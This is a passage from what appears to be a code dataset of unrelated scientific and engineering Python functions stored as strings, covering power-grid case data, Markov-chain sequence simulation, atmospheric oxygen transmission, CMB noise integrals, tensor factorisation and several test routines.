0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 
0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data 
-----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def marcovNuc (i = random.choice(stateSpace), step = 100):\n # matrix of transition probabilities\n #matrix = [[0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25]] \n matrix = [[0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1]] \n step += 1 # add one to the range because we remove it at the end\n sims = [] # List to hold the results of the Marcov chain\n sims.append(i) # append the seed value to the sims list\n for x in range(step):\n \n if sims[-1] == 'A':\n w = np.random.random() # Random number generator\n # the next set of if statements determine where the random number \n # sits on the number line of probabilities\n if matrix[0][0] > w:\n sims.append('A')\n elif matrix[0][1] + matrix[0][0] > w:\n sims.append('C')\n elif matrix[0][2] + matrix[0][1] + matrix[0][0] > w:\n sims.append('G')\n else:\n sims.append('T')\n elif sims[-1] == 'C':\n x = np.random.random()\n if matrix[1][0] > x:\n sims.append('A')\n elif matrix[1][1] + matrix[1][0] > x:\n sims.append('C')\n elif matrix[1][2] + matrix[1][1] + matrix[1][0] > x:\n sims.append('G')\n else:\n sims.append('T')\n \n elif sims[-1] == 'G':\n y = np.random.random()\n if matrix[2][0] > y:\n sims.append('A')\n elif matrix[2][1] + matrix[2][0] > y:\n sims.append('C')\n elif matrix[2][2] + matrix[2][1] + matrix[2][0] > y:\n sims.append('G')\n else:\n sims.append('T')\n\n else:\n z = np.random.random()\n if matrix[3][0] > z:\n sims.append('A')\n elif matrix[3][1] + matrix[3][0] > z:\n sims.append('C')\n elif matrix[3][2] + matrix[3][1] + matrix[3][0] > z:\n sims.append('G')\n else:\n sims.append('T')\n\n return sims[1:-1] # remove the initial value (the seed)", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of 
floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def p(e, t):\n return b * e ** 2", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. 
We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def N_TB_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalBB(l2)\n result += 0. 
#self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EB.__func__, \"integ\"):\n self.N_TB_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. 
A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def sum_simulated_test():\n f = open(\"./results/simulated_sigmoid_sum.csv\", \"w\")\n #f1 = open(\"./results/avg_pres.txt\", \"w\")\n #f.write(\"num. of qubits; precision\\n\")\n\n\n computable_qubits = 27\n num_subtest = 1000\n\n acum_precision = 0\n coeffs = []\n temp = -10\n while temp < 11:\n coeffs.append(temp)\n temp += 0.25\n #for coeff in coeffs:\n # variables.c_summation = coeff\n # print(coeff)\n for i in range(2, computable_qubits):\n #print(\"qubit: \", i)\n precision = 0\n x = []\n for j in range(num_subtest):\n\n random_dict = get_random_dict(i)\n\n # compute real answer\n real_answer = 0\n for value in random_dict.values():\n real_answer += value\n # f1.write(str(real_answer)+\";\")\n x.append(real_answer)\n\n # assign spin value to real_answer\n if real_answer < 0:\n real_answer = -1\n elif real_answer > 0:\n real_answer = 1\n else:\n real_answer = 0\n bqm = get_bqm()\n quantum_sigmoid_sum(bqm, random_dict, \"target\")\n sampler = get_simulated_sampler()\n result = sampler.sample(bqm)\n if real_answer == 0:\n precision += 1\n # f1.write(\"1\\n\")\n elif real_answer == result.first.sample['target']:\n precision += 1\n # f1.write(\"1\\n\")\n# else:\n # f1.write(\"0\\n\")\n\n precision /= num_subtest\n # acum_precision+= precision\n\n f.write(str(i) + \";\" + str(precision) + \"\\n\")\n f.close()\n #f1.write(str(coeff)+\";\"+ str(round(acum_precision/(computable_qubits-1), 4)) + \"\\n\")\n # acum_precision = 0\n #f1.close()", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n 
\n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 
1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def simulate_func(function, t): \n out = function.PLsig(t)\n \n return out, True", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= 